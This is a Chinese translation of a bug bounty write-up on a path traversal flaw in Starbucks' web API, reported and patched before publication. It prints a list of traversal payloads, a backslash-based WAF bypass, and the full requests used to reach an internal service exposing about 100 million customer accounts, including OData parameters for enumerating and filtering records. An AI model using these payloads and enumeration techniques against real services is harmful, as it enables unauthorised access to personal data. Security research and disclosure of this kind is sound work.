漏洞报告:“入侵”星巴克并访问1亿客户记录

安全 漏洞
Sam花了一整天的尝试,仍然没有在Verizon Media漏洞赏金计划中有所收获,于是,他决定先退出做一些其他事情。他上网准备订购星巴克的礼品卡,作为朋友的生日礼物。

Sam花了一整天的尝试,仍然没有在Verizon Media漏洞赏金计划中有所收获,于是,他决定先退出做一些其他事情。他上网准备订购星巴克的礼品卡,作为朋友的生日礼物。

[[330909]]

当sam在星巴克官网上试图购买时,他发现了API调用的可疑之处:在以“ / bff / proxy /”为前缀的API下发送了一些请求,但这些请求返回的数据似乎来自另一台主机。

正好,由于星巴克有一个漏洞赏金计划,于是,继续研究下去吧。

以下是返回sam的用户信息的其中之一的API调用示例:

  1. POST /bff/proxy/orchestra/get-user HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "data": { 
  7.  
  8.     "user": { 
  9.  
  10.       "exId": "77EFFC83-7EE9-4ECA-9049-A6A23BF1830F", 
  11.  
  12.       "firstName": "Sam", 
  13.  
  14.       "lastName": "Curry", 
  15.  
  16.       "email": "samwcurry@gmail.com", 
  17.  
  18.       "partnerNumber": null, 
  19.  
  20.       "birthDay": null, 
  21.  
  22.       "birthMonth": null, 
  23.  
  24.       "loyaltyProgram": null 
  25.  
  26.     } 
  27.  
  28.   } 
  29.  

在上面的示例中,“ app.starbucks.com”主机将无法访问通过特定端点访问的数据,但可以充当假设的第二个主机的代理或中间人,“internal.starbucks.com”。

这里要考虑的一些有趣的事情是……

  • 我们如何测试应用程序的路由?
  • 如果应用程序将请求路由到内部主机,则权限模型是什么样的?
  • 我们可以控制发送到内部主机的请求中的路径或参数吗?
  • 内部主机上是否有开放重定向,如果有,应用程序将遵循开放重定向吗?
  • 返回的内容是否必须匹配适当的类型(是否解析JSON,XML或任何其他数据?)

Sam做的第一件事是尝试遍历API调用,以便可以加载其他路径,而执行此操作的方式是发送以下负载:

  1. /bff/proxy/orchestra/get-user/..%2f 
  2.  
  3. /bff/proxy/orchestra/get-user/..;/ 
  4.  
  5. /bff/proxy/orchestra/get-user/../ 
  6.  
  7. /bff/proxy/orchestra/get-user/..%00/ 
  8.  
  9. /bff/proxy/orchestra/get-user/..%0d/ 
  10.  
  11. /bff/proxy/orchestra/get-user/..%5c 
  12.  
  13. /bff/proxy/orchestra/get-user/..\ 
  14.  
  15. /bff/proxy/orchestra/get-user/..%ff/ 
  16.  
  17. /bff/proxy/orchestra/get-user/%2e%2e%2f 
  18.  
  19. /bff/proxy/orchestra/get-user/.%2e/ 
  20.  
  21. /bff/proxy/orchestra/get-user/%3f (?) 
  22.  
  23. /bff/proxy/orchestra/get-user/%26 (&) 
  24.  
  25. /bff/proxy/orchestra/get-user/%23 (#) 

可惜的是,这些都不起作用。它们都返回了我通常会看到的相同的404页面……

在这种情况下,我们可以将“ / bff / proxy / orchestra / get-user”视为我们正在调用的未包含用户输入的函数。同时,我们有机会找到一个确实接受用户输入的函数,例如“ / bff / proxy / users /:id”,在这里我们有足够的空间测试它将接受的数据。如果我们发现这样的API调用,那么尝试遍历有效负载并发送其他数据(实际上是在用户输入中接收)可能会更有帮助。

Sam仔细留意这个App,发现了更多的API调用。而他发现的接受用户输入的第一个信息是:

  1. GET /bff/proxy/v1/me/streamItems/:streamItemId HTTP/1.1  
  2. Host: app.starbucks.com 

这个端点不同于“get user”端点,因为最后一个路径作为参数存在,在其中提供了任意输入。如果将此输入作为内部系统上的路径处理,那么完全可能遍历它并访问其他内部端点。

幸运的是,sam尝试的第一个测试返回了一个非常好的指标,表明可以遍历端点:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/..\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "errors": [ 
  7.  
  8.     { 
  9.  
  10.       "message": "Not Found", 
  11.  
  12.       "errorCode": 404, 
  13.  
  14.       ... 

这个JSON响应与“ / bff / proxy”下所有其他常规API调用的JSON响应相同。这表明sam正在使用内部系统,并且已经成功地修改了正在与之交谈的路径。下一步将是映射内部系统,而做到这一点的最佳方法将是通过标识返回“ 400错误请求”的第一条路径遍历到根。

但很快,sam遇到了一个障碍。有一个WAF让他不能深入两个目录:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/..\..\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5. HTTP/1.1 403 Forbidden 
  6.  
  7. 不过,这个WAF很弱…… 
  8.  
  9. GET /bff/proxy/v1/me/streamItems/web\..\.\..\ HTTP/1.1 
  10.  
  11. Host: app.starbucks.com 
  12.  
  13.  
  14.   "errors": [ 
  15.  
  16.     { 
  17.  
  18.       "message": "Not Found", 
  19.  
  20.       "errorCode": 404, 
  21.  
  22.       ... 

最终,在返回7条路径后,sam收到了以下错误:

  1. GET /bff/proxy/v1/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\..\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "errors": [ 
  7.  
  8.     { 
  9.  
  10.       "message": "Bad Request", 
  11.  
  12.       "errorCode": 400, 
  13.  
  14.       ... 

这意味着内部API的根是6个返回路径,可以使用目录暴力破解工具或Burp Suite的入侵者和单词列表将其映射出来。

此时,sam对这个漏洞更加感兴趣了,他和Justin Gardner进行了探讨。

而Justin Gardner几乎立即在内部系统的根目录下识别出许多路径,方法是观察到对这些路径的HTTP请求,之后如果没有正斜杠,就会使用Burp的入侵者返回重定向代码:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5. HTTP/1.1 301 Moved Permanently 
  6.  
  7. Server: nginx 
  8.  
  9. Content-Type: text/html 
  10.  
  11. Content-Length: 162 
  12.  
  13. Location: /search/ 

Justin致力于寻找所有端点时,sam开始逐一研究每个目录。运行完自己的扫描后,sam发现“搜索”下有“v1”,而“v1”下有“账户”和“地址”。

于是,他给Justin发了一条消息,想想如果“ / search / v1 / accounts”端点是对所有生产帐户的搜索,那将是多么有趣……

而事实,果然如此。“ / search / v1 / accounts”可以访问所有星巴克帐户的Microsoft Graph实例。

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search\v1\Accounts\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Accounts", 
  7.  
  8.   "value": [ 
  9.  
  10.     { 
  11.  
  12.       "Id": 1, 
  13.  
  14.       "ExternalId": "12345", 
  15.  
  16.       "UserName": "UserName", 
  17.  
  18.       "FirstName": "FirstName", 
  19.  
  20.       "LastName": "LastName", 
  21.  
  22.       "EmailAddress": "0640DE@example.com", 
  23.  
  24.       "Submarket": "US", 
  25.  
  26.       "PartnerNumber": null, 
  27.  
  28.       "RegistrationDate": "1900-01-01T00:00:00Z", 
  29.  
  30.       "RegistrationSource": "iOSApp", 
  31.  
  32.       "LastUpdated": "2017-06-01T15:32:56.4925207Z" 
  33.  
  34.     }, 
  35.  
  36. ... 
  37.  
  38. lots of production accounts 

此外,“地址”端点返回了类似的信息……

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search\v1\Addresses\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Addresses", 
  7.  
  8.   "value": [ 
  9.  
  10.     { 
  11.  
  12.       "Id": 1, 
  13.  
  14.       "AccountId": 1, 
  15.  
  16.       "AddressType": "3", 
  17.  
  18.       "AddressLine1": null, 
  19.  
  20.       "AddressLine2": null, 
  21.  
  22.       "AddressLine3": null, 
  23.  
  24.       "City": null, 
  25.  
  26.       "PostalCode": null, 
  27.  
  28.       "Country": null, 
  29.  
  30.       "CountrySubdivision": null, 
  31.  
  32.       "FirstName": null, 
  33.  
  34.       "LastName": null, 
  35.  
  36.       "PhoneNumber": null 
  37.  
  38.     }, 
  39.  
  40. ... 
  41.  
  42. lots of production addresses 

它是为生产帐户和地址提供的服务。随后,sam开始进一步探索该服务,以使用Microsoft Graph功能进行确认。

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\Search\v1\Accounts?$count=true 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Accounts", 
  7.  
  8.   "@odata.count":99356059 
  9.  

通过从Microsoft Graph URL添加“ $ count”参数,可以确定该服务具有近1亿条记录。攻击者可以通过添加“ $ skip”和“ $ count”之类的参数枚举所有用户帐户来窃取此数据。

此外,要查明特定的用户帐户,攻击者可以使用“ $ filter”参数:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\Search\v1\Accounts?$filter=startswith(UserName,'redacted') HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Accounts", 
  7.  
  8.   "value": [ 
  9.  
  10.     { 
  11.  
  12.       "Id": 81763022, 
  13.  
  14.       "ExternalId": "59d159e2-redacted-redacted-b037-e8cececdf354", 
  15.  
  16.       "UserName": "redacted@gmail.com", 
  17.  
  18.       "FirstName": "Justin", 
  19.  
  20.       "LastName": "Gardner", 
  21.  
  22.       "EmailAddress": "redacted@gmail.com", 
  23.  
  24.       "Submarket": "US", 
  25.  
  26.       "PartnerNumber": null, 
  27.  
  28.       "RegistrationDate": "2018-05-19T18:52:15.0763564Z", 
  29.  
  30.       "RegistrationSource": "Android", 
  31.  
  32.       "LastUpdated": "2020-05-16T23:28:39.3426069Z" 
  33.  
  34.     } 
  35.  
  36.   ] 
  37.  

最后,sam还发现的其他一些端点,可能(尚未确认)使攻击者能够访问和修改帐单地址、礼品卡、奖励和优惠等内容。

  1. barcode, loyalty, appsettings, card, challenge, content, identifier, identity, onboarding, orderhistory, permissions, product, promotion, account, billingaddress, enrollment, location, music, offers, rewards, keyserver 

时间线

  • 5月16日报道
  • 5月17日补丁
  • 5月19日颁发赏金(4000美元)
  • 6月16日公开

参考链接:https://samcurry.net/hacking-starbucks/

 

责任编辑:赵宁宁 来源: FreeBuf
相关推荐

2015-09-20 21:02:36

2020-11-05 08:20:01

星巴克官网漏洞web安全

2013-05-24 09:18:47

游戏设计

2012-01-10 10:36:48

云计算

2012-02-22 16:32:42

星巴克WifiUC浏览器

2021-03-29 15:44:21

数据管理

2012-06-25 15:39:12

云计算案例

2015-08-14 13:43:43

2019-06-25 08:28:06

区块链供应链沃尔玛

2012-03-31 10:03:41

WiFi

2017-09-25 14:47:11

支付宝微信Apple Pay

2011-12-06 20:52:03

移动支付

2021-11-18 11:45:54

Stripchat漏洞信息泄露

2010-09-02 12:30:40

2021-04-14 14:12:20

WRECK漏洞IoT设备

2014-01-03 15:57:39

ICT星巴克

2015-06-25 13:01:28

大数据星巴克海底捞

2018-08-02 14:09:58

新零售

2021-04-18 09:41:48

WRECK DNS漏洞NAME

2023-06-27 08:47:20

点赞
收藏

51CTO技术栈公众号